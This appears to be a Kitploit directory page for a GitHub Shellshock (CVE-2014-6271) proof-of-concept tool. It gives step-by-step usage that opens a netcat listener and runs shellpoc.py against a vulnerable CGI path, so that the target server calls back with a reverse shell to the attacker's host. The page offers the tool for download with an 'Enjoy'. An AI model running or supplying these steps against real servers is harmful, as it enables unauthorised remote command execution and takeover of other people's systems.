Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2014-6271 — Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell | Kitploit
Tools/GitHubGitHub/zalalov/cve-2014-6271
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubzalalov/cve-2014-6271

CVE-2014-6271

Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell

View Repository
429 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2014-6271

python2.7

  • Start listening on your machine.
root@kitploit:~
nc -l -p 4444
  • Run python script by the rule below:

python shellpoc.py <host> <vulnerable CGI> <attackhost/IP>

root@kitploit:~
python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444
  • Enjoy
Download Tool